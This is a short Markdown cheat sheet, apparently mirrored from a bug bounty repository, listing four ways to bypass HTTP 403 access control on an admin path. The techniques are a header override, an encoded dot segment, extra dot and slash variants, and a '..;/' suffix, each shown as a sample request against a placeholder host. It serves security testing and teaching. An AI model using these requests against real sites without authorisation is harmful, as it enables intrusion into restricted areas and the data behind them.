mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2025-01-30 14:55:05 +00:00
45 lines
721 B
Markdown
45 lines
721 B
Markdown
# 403 Forbidden Bypass
|
|
|
|
1. Using "X-Original-URL" header
|
|
```
|
|
GET /admin HTTP/1.1
|
|
Host: target.com
|
|
```
|
|
Try this to bypass
|
|
```
|
|
GET /anything HTTP/1.1
|
|
Host: target.com
|
|
X-Original-URL: /admin
|
|
```
|
|
|
|
2. Appending **%2e** after the first slash
|
|
```
|
|
http://target.com/admin => 403
|
|
```
|
|
Try this to bypass
|
|
```
|
|
http://target.com/%2e/admin => 200
|
|
```
|
|
|
|
3. Try add dot (.) and slash (/) in the URL
|
|
```
|
|
http://target.com/admin => 403
|
|
```
|
|
Try this to bypass
|
|
```
|
|
http://target.com/admin/. => 200
|
|
http://target.com//admin// => 200
|
|
http://target.com/./admin/./ => 200
|
|
```
|
|
|
|
4. Add "..;/" after the directory name
|
|
```
|
|
http://target.com/admin
|
|
```
|
|
Try this to bypass
|
|
```
|
|
http://target.com/admin..;/
|
|
```
|
|
|
|
Source: [https://twitter.com/iam_j0ker]()
|